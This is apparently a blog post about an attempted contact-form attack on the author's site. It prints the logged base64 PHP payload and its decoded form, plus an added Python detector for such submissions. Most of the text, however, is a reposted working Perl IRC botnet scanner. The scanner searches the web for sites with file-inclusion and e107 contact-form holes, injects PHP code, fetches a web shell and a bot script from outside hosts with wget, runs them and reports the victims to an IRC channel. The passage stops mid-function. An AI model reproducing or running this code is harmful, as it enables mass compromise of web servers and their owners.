The blog stopping attacks, again

I'm here to show you, once again, how the blog's security system owns anyone who tries something, hahaha. This attack, truth be told, has been the most "sophisticated" one so far, so to speak...

Looking through my log, I found that someone with bad intentions had tried to submit this code through the contact form:

[php]
eval(base64_decode(\'ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOi
IucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsN
CiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5j
dGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpe
w0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcm
VzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3R
pb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGV
jKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJyk
pew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9n
ZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmd
W5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcG
Fzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9
iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBw
b3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZ
ikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw
0KfX0NCnJldHVybiAkcmVzOw0KfQ==\'));die();
[/php]

base64_decode()? OK, let's see what I get if I decode the base64:

[codesyntax lang="php" lines="normal" lines_start="0" container="pre_table" blockstate="expanded"]
// Banner plus host fingerprint: the scanner further down greps the response
// for "v0pCr3w<br>sys:...<br>nob0dyCr3w" to confirm that its code ran.
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;

// Runs $cfe through whichever command-execution function is still enabled,
// so disabling just one of them in php.ini does not stop it.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
[/codesyntax]
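The decode-and-inspect step just shown, automated as an added example (not part of the original post and not the blog's own security system): it finds the eval(base64_decode()) wrapper in a logged submission, decodes the blob even when the log wrapped it across lines, and flags the command-execution functions and the v0pCr3w/nob0dyCr3w banner strings the payload carries. Python is used so it runs stand-alone over a log line; the same logic ports to a PHP form handler. The function names, the regex and the constructed sample submission are mine, not anything taken from the page.

```python
import base64
import binascii
import re

# Wrapper shape seen in the logged submission:  eval(base64_decode(\'...\'));die();
# The optional backslash covers the escaped quotes the form stored, and \s in the
# character class allows the line breaks that wrapped the blob in the log.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\\?['\"]([A-Za-z0-9+/=\s]+)\\?['\"]",
    re.IGNORECASE,
)

# Functions the decoded payload tries in turn, plus its host-fingerprint call.
DANGEROUS_FUNCS = (
    "exec", "shell_exec", "system", "passthru", "popen", "proc_open", "php_uname",
)

# Banner strings the payload prints so the scanner can confirm execution.
KNOWN_MARKERS = ("v0pCr3w", "nob0dyCr3w")


def decode_payload(blob):
    """Decode a base64 blob that may contain whitespace; None if it is not valid base64."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)  # repair padding the log may have lost
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def dangerous_calls(php_source):
    """Sorted names from DANGEROUS_FUNCS that are actually called in the source."""
    return sorted(
        name for name in DANGEROUS_FUNCS
        if re.search(r"\b" + re.escape(name) + r"\s*\(", php_source)
    )


def inspect_submission(text):
    """Find every eval(base64_decode()) wrapper in a submission and classify each one."""
    findings = []
    for match in EVAL_B64_RE.finditer(text):
        decoded = decode_payload(match.group(1))
        if decoded is None:
            # The wrapper alone is reason to reject; we just could not look inside.
            findings.append({"decoded": None, "functions": [], "markers": [],
                             "verdict": "suspicious"})
            continue
        funcs = dangerous_calls(decoded)
        markers = sorted(m for m in KNOWN_MARKERS if m in decoded)
        findings.append({
            "decoded": decoded,
            "functions": funcs,
            "markers": markers,
            "verdict": "malicious" if (funcs or markers) else "suspicious",
        })
    return findings


def is_malicious(text):
    return any(f["verdict"] == "malicious" for f in inspect_submission(text))


# Constructed sample mirroring the structure of the payload in the post
# (banner, fingerprint, then a fallback chain of command-execution calls).
SAMPLE_PHP = (
    'echo "v0pCr3w<br>"; echo "sys:".php_uname()."<br>";\n'
    '$cmd="echo nob0dyCr3w";\n'
    'if(function_exists("exec")){@exec($cmd,$res);}\n'
    'elseif(function_exists("shell_exec")){$res=@shell_exec($cmd);}\n'
    'elseif(function_exists("system")){@system($cmd);}\n'
)


def build_sample_submission():
    """Wrap SAMPLE_PHP the way the attacker did, with the blob line-wrapped at 60 chars."""
    blob = base64.b64encode(SAMPLE_PHP.encode()).decode()
    wrapped = "\n".join(blob[i:i + 60] for i in range(0, len(blob), 60))
    return "eval(base64_decode(\\'" + wrapped + "\\'));die();"


if __name__ == "__main__":
    for finding in inspect_submission(build_sample_submission()):
        print(finding["verdict"], finding["functions"], finding["markers"])
    print(inspect_submission("Hola, gran post sobre seguridad"))
```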

Well, well, what do we have here? hahaha. I googled around a bit to find out who these "v0pCr3w" were and came across this:

[codesyntax lang="perl" lines="normal" lines_start="0" container="pre_table"]

#!/usr/bin/perl

# nob0dy Priv8 Scanner SE v1.2

# Coded by Vrs-hCk

# ander[at]antisecurity.org

# Last Edited: Jun 21 2010

# How to use:

# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeproc

use HTTP::Request;

use LWP::UserAgent;

use IO::Socket;

use IO::Select;

use Socket;

use MIME::Base64;

my $datetime = localtime;

my $fakeproc  = $ARGV[6];

$ircserver = $ARGV[0] unless $ircserver;

my $ircport   = $ARGV[1];

my $nickname  = $ARGV[2];

my $ident     = $ARGV[3];

my $channel   = '#'.$ARGV[4];

my $admin     = $ARGV[5];

my $fullname  = "( nob0dy )";

my $nob0dy    = "15(7@2nob0dy15)";

my $lfilogo   = "15(7@2LFI15)";

my $lfdlogo   = "15(7@2LFD15)";

my $e107logo  = "15(7@2e10715)";

my $lficmd    = '!lfi';

my $lfdcmd    = '!lfd';

my $e107cmd   = '!e107';

my $injector  = "http://opendoor.ie/logs/logs";

my $botshell  = "http://antrax.us/tools/bot.pl";

my $uagent    = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';

my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";

my $lfdoutput = "root:(.+):(.+):(.+):(.+):(.+):(.+)";

if (@ARGV == 7) {

    print "\n[+] nob0dy Priv8 Scanner SE\n".

          "[+] IRC Host    : $ircserver\n".

          "[+] IRC Port    : $ircport\n".

          "[+] Bot Nick    : $nickname\n".

          "[+] Bot Ident   : $ident\n".

          "[+] Channel     : $channel\n".

          "[+] Bot Admin   : $admin\n".

          "[+] Process/PID : $fakeproc - $$\n\n";

}

else {

    print "\n[USAGE] perl $0 irc.server.net 6667 nick ident channel admin /usr/sbin/fakeproc\n\n";

    exit();

}

$SIG{'INT'}   = 'IGNORE';

$SIG{'HUP'}   = 'IGNORE';

$SIG{'TERM'}  = 'IGNORE';

$SIG{'CHLD'}  = 'IGNORE';

$SIG{'PS'}    = 'IGNORE';

chdir("/");

$ircserver = "$ARGV[0]" if $ARGV[0];

$0 = "$fakeproc"."" x 16;

my $pid = fork;

exit if $pid;

die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;

our %DCC;

my $dcc_sel = new IO::Select->new();

$sel_client = IO::Select->new();

sub sendraw {

    if ($#_ == '1') {

    my $socket = $_[0];

    print $socket "$_[1]\n";

    } else {

        print $IRC_cur_socket "$_[0]\n";

    }

}

sub connector {

    my $mynick = $_[0];

    my $ircserver_con = $_[1];

    my $ircport_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);

    if (defined($IRC_socket)) {

        $IRC_cur_socket = $IRC_socket;

        $IRC_socket->autoflush(1);

        $sel_client->add($IRC_socket);

        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";

        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;

        nick("$mynick");

        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");

        sleep 1;

    }

}

sub parse {

    my $servarg = shift;

    if ($servarg =~ /^PING \:(.*)/) {

        sendraw("PONG :$1");

    }

    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {

        if (lc($1) eq lc($mynick)) {

            $mynick = $4;

            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        }

    }

    elsif ($servarg =~ m/^\:(.+?)\s+433/i) {

        nick("$mynick".int rand(999));

    }

    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {

        $mynick = $2;

        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";

        sendraw("MODE $mynick +Bx");

        sendraw("JOIN $channel");

        sleep(1);

        sendraw("PRIVMSG $channel :Hosted by: Midnightcr3w - Private ScanneR");

        sendraw("PRIVMSG $admin :Hi $admin im here !!!");

    }

}

my $line_temp;

while( 1 ) {

    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }

    delete($irc_servers{''}) if (defined($irc_servers{''}));

    my @ready = $sel_client->can_read(0);

    next unless(@ready);

    foreach $fh (@ready) {

        $IRC_cur_socket = $fh;

        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};

        $nread = sysread($fh, $ircmsg, 4096);

        if ($nread == 0) {

            $sel_client->remove($fh);

            $fh->close;

            delete($irc_servers{$fh});

        }

        @lines = split (/\n/, $ircmsg);

        $ircmsg =~ s/\r\n$//;

        if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {

            my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);

            if ($path eq $mynick) {

                if ($msg =~ /^PING (.*)/) {

                    sendraw("NOTICE $nick :PING $1");

                }

                if ($msg =~ /^VERSION/) {

                    sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");

                }

                if ($msg =~ /^TIME/) {

                    sendraw("NOTICE $nick :TIME ".$datetime."");

                }

                if (&isAdmin($nick) && $msg eq "!die") {

                    &shell("$path","kill -9 $$");

                }

                if (&isAdmin($nick) && $msg eq "!killall") {

                    &shell("$path","killall -9 perl");

                }

                if (&isAdmin($nick) && $msg eq "!reset") {

                    sendraw("QUIT :Restarting...");

                }

                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

                    sendraw("JOIN #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

                    sendraw("PART #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {

                    sendraw("NICK ".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^!pid/) {

                    sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");

                }

                if (&isAdmin($nick) && $msg !~ /^!/) {

                    &shell("$nick","$msg");

                }

            }

            else {

                if (&isAdmin($nick) && $msg eq "!die") {

                    &shell("$path","kill -9 $$");

                }

                if (&isAdmin($nick) && $msg eq "!killall") {

                    &shell("$path","killall -9 perl");

                }

                if (&isAdmin($nick) && $msg eq "!reset") {

                    sendraw("QUIT :Restarting...");

                }

                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

                    sendraw("JOIN #".$1);

                }

                if (&isAdmin($nick) && $msg eq "!part") {

                    sendraw("PART $path");

                }

                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

                    sendraw("PART #".$1);

                }

                if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {

                    &shell("$path","$1");

                }

                if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {

                    &shell("$path","$1");

                }

                ##################################################################### HELP COMMAND

                if ($msg=~ /^!help/) {

                    my $helplogo = "15(7@2Help15)";

                    &notice("$nick","$helplogo 12LFI Vuln Scan:6 $lficmd [bug] [dork]");

                    &notice("$nick","$helplogo 12LFD Vuln Scan:6 $lfdcmd [bug] [dork]");

                    &notice("$nick","$helplogo 12e107 Vuln Scan:6 $e107cmd [bug] [dork]");

                }

                if ($msg=~ /^!response/ || $msg=~ /^!id/) {

                    if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 3UP");

                    } else {

                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 4Down");

                    }

                }

                if (&isAdmin($nick) && $msg =~ /^!pid/) {

                    &notice("$nick","6Fake Process/PID : $fakeproc - $$");

                }

                ##################################################################### LFD SCAN

                if ($msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            my ($bug,$dork) = ($1,$2);

                            &msg("$path","$lfdlogo 12Dork :4 $dork");

                            &msg("$path","$lfdlogo 12Bugz :4 $bug");

                            &msg("$path","$lfdlogo 6Search Engine Loading ...");

                            &lfd_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                        }

                        exit;

                    }

                }

                ##################################################################### LFIRCE SCAN

                if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                                my ($bug,$dork) = ($1,$2);

                                &msg("$path","$lfilogo 12Dork :4 $dork");

                                &msg("$path","$lfilogo 12Bugz :4 $bug");

                                &msg("$path","$lfilogo 6Search Engine Loading ...");

                                &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                            } else {

                                &msg("$path","[ $nick ] $lfilogo 4PHP Shell is Down!");

                            }

                        }

                        exit;

                    }

                }

                ##################################################################### e107 contact.php SCAN

                if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) {

                    if (my $pid = fork) {

                        waitpid($pid, 0);

                    }

                    else {

                        if (fork) { exit; } else {

                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {

                                my ($bug,$dork) = ($1,$2);

                                &msg("$path","$e107logo 12Dork :4 $dork");

                                &msg("$path","$e107logo 12Bugz :4 $bug");

                                &msg("$path","$e107logo 6Search Engine Loading ...");

                                &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");

                            } else {

                                &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!");

                            }

                        }

                        exit;

                    }

                }

                #####################################################################

            }

        }

        for(my $c=0; $c<= $#lines; $c++) {

            $line = $lines[$c];

            $line = $line_temp.$line if ($line_temp);

            $line_temp = '';

            $line =~ s/\r$//;

            unless ($c == $#lines) {

                parse("$line");

            } else {

                if ($#lines == 0) {

                    parse("$line");

                } elsif ($lines[$c] =~ /\r$/) {

                    parse("$line");

                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {

                    parse("$line");

                } else {

                    $line_temp = $line;

                }

            }

        }

    }

}

#########################################

sub lfd_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfd($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

sub lfi_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &lfi($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

sub e107_start() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    if ($engine =~ /google/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"GooGLe");

        } exit; }

    }

    if ($engine =~ /alltheweb/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"AllTheWeb");

        } exit; }

    }

    if ($engine =~ /bing/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"Bing");

        } exit; }

    }

    if ($engine =~ /altavista/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"ALtaViSTa");

        } exit; }

    }

    if ($engine =~ /ask/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"AsK");

        } exit; }

    }

    if ($engine =~ /uol/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"UoL");

        } exit; }

    }

    if ($engine =~ /yahoo/i) {

        if (my $pid = fork) { waitpid($pid, 0); }

        else { if (fork) { exit; } else {

            &e107($chan,$bug,$dork,"YahOo");

        } exit; }

    }

}

#########################################

sub lfd() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$lfdlogo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $test = "http://".$site.$bug.$lfdtest;

            my $vuln = "http://".$site."12".$bug."6".$lfdtest;

            my $html = get_content($test);

            if ($html =~ /$lfdoutput/) {

                &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy");

                sleep(3);

            }

        }

    }

}

sub lfi() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$lfilogo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$lfilogo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";

            my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";

            my $vuln = "http://".$site."12".$bug."6".$dir."7/proc/self/environ%0000";

            my $shell = "http://".$site."12".$bug."6".$dir."7/tmp/x-treme%0000";

            my $html = get_content($test);

            if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $code = 'echo "c0li#".php_uname()."#c0li"; if(@copy("'.$injector.'","/tmp/x-treme")) { echo "SUCCESS"; }';

                    my $res = lfi_env_query($test,encode_base64($code));

                    &lfi_spread_query($test);

                    $res =~ s/\n//g;

                    if ($res =~ /c0li#(.*)#c0liSUCCESS/sg) {

                        my $sys = $1;

                        &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHell15)4 ".$shell." 15(7@3".$sys."15)$nob0dy");

                        sleep(4);

                    }

                    elsif ($res =~ /c0li#(.*)#c0li/sg) {

                        if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                            my $sys = $1;

                            my $upload = 'system("wget '.$injector.' -O /tmp/x-treme");';

                            my $wget = lfi_env_query($test,encode_base64($upload)); sleep(1);

                            my $check = get_content("http://".$site.$bug.$dir."/tmp/x-treme%0000"); sleep(1);

                            if ($check =~ /Hacked by Vrs-hCk/) {

                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHeLL15)4 ".$shell." 15(7@3".$sys."15)$nob0dy");

                                sleep(4);

                            }

                            else {

                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12SysTem15)4 ".$vuln." 15(7@3".$sys."15)$nob0dy");

                                sleep(4);

                            }

                        } exit; }

                    }

                    else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12EnviRon15)4 ".$vuln." $nob0dy"); }

                } exit; } sleep(3);

            }

        }

    }

}

sub e107() {

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $count = 0;

    my @list = search_engine($chan,$bug,$dork,$engine,$e107logo);

    my $num = scalar(@list);

    if ($num > 0) {

        foreach my $site (@list) {

            $count++;

            if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); }

            my $test = "http://".$site.$bug;

            my $code = "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";

            my $html = e107_rce_query($test,$code);

            if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $sys = $1;

                    my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }';

                    my $res = e107_rce_query($test,encode_base64($upload));

                    if ($res =~ /c0liSUKSESc0li/) {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");

&msg("ScanneD","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");

                        sleep(5);

                    }

                    else {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@12safemode-off15)");

                        sleep(5);

                    }

                    &e107_spread_query($test);

                    sleep(2);

                } exit; } sleep(5);

            }

            elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {

                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

                    my $sys = $1;

                    my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }';

                    my $res = e107_rce_query($test,encode_base64($upload));

                    if ($res =~ /c0liSUKSESc0li/) {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@4safemode-on15)");

                        sleep(5);

                    }

                    else {

                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)");

                        sleep(5);

                    }

                } exit; } sleep(5);

            }

        }

    }

}

#########################################

sub search_engine() {

    my (@total,@clean);

    my $chan = $_[0];

    my $bug = $_[1];

    my $dork = $_[2];

    my $engine = $_[3];

    my $logo = $_[4];

    if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }

    if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }

    if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }

    if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }

    if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }

    if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }

    if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }

    @clean = clean(@total);

    &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")");

    return @clean;

}

#########################################

sub rfi_os() {

    my $sys = "";

    my $url = $_[0];

    my $chk = get_content($url);

    if ($chk =~ /<br>sys:(.+?)<br>/sg) { $sys = $1; }

    return $sys;

}

sub rce_os() {

    my $sys = "";

    my $url = $_[0];

    my $chk = get_content($url);

    $chk =~ s/\n//;

    if ($chk =~ /999(.*)666/sg) { $sys = $1; }

    return $sys;

}

sub isFound() {

    my $status = 0;

    my $link = $_[0];

    my $reqexp = $_[1];

    my $res = get_content($link);

    if ($res =~ /$reqexp/) { $status = 1 }

    return $status;

}

sub get_content() {

    my $url = $_[0];

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

    return $res->content;

}

sub lfi_env_query() {

    my $url = $_[0];

    my $code = $_[1];

    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");

    $ua->timeout(10);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

    return $res->content;

}

sub lfi_spread_query() {

    my $url = $_[0];

    my $botnick = 'x-bot['.(int rand(6666)).']';

    my $botchan = $channel;

    $botchan =~ s/\#//;

    my $code = "system('rm -rf /tmp/x-bot;wget $botshell -O /tmp/x-bot;perl /tmp/x-bot $ircserver $ircport $botnick xbot $botchan $admin /usr/bin/php');";

    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");

    $ua->timeout(5);

    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);

}

sub e107_rce_query() {

    my $url = $_[0];

    my $code = $_[1];

    my $req = HTTP::Request->new(POST => $url);

    $req->content_type('application/x-www-form-urlencoded');

    $req->content("send-contactus=1&author_name=
PHP Code:
eval(base64_decode('".$code."'));die;
");

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $res = $ua->request($req);

    return $res->content;

}

sub e107_spread_query() {

    my $url = $_[0];

